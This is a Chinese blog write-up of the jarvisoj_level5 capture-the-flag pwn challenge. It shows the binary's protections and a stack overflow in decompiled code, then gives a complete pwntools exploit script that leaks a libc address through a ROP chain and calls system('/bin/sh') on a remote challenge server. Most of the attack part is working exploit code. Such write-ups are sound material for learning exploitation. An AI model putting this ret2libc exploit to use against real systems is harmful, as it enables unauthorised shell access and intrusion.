HugeH4rD

jarvisoj_level5

Ubuntu 16 来源：https://github.com/bash-c/pwn_repo

0x01

checksec

[*] '/home/zelas/Desktop/pwn/jarvisoj_level5/level3_x64'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA

vulnerable_function()

ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  write(1, "Input:\n", 7uLL);
  return read(0, buf, 0x200uLL);
}

0x02

思路 ret2libc x64

1.溢出泄露libc

2.计算地址

3.溢出执行system

0x03

exp

from pwn import *

context(os='linux', arch='amd64', log_level='debug')
io = remote('node4.buuoj.cn', 28268)
path = './level3_x64'
# io = process([path])
elf = ELF(path)
libc = ELF('./libc-2.23.so')

padding = 0x80 + 8
main = elf.symbols['main']
write_plt = elf.plt['write']
write_got = elf.got['write']
pop_rdi_ret = 0x4006b3  # pop rdi ; ret
pop_rsi_r15_ret = 0x4006b1  # pop rsi ; pop r15 ; ret
payload = flat(b'a'*padding, pop_rdi_ret, 1, pop_rsi_r15_ret, write_got, 0x8, write_plt, main)
delims = b'Input:\n'
io.sendlineafter(delims, payload)
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
print('[+] write_address -->', hex(write_addr))

libc_base = write_addr - libc.symbols['write']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))
print('[+] libc_base -->', hex(libc_base))
print('[+] system -->', hex(system))
print('[+] bin_sh -->', hex(bin_sh))
payload1 = flat(b'a'*padding, pop_rdi_ret, bin_sh, system)
io.sendline(payload1)
io.interactive()

匿名评论隐私政策

✅ 你无需删除空行，直接评论以获取最佳展示效果

jarvisoj_level5

0x01

checksec

IDA

0x02

0x03

Zelas2Xerath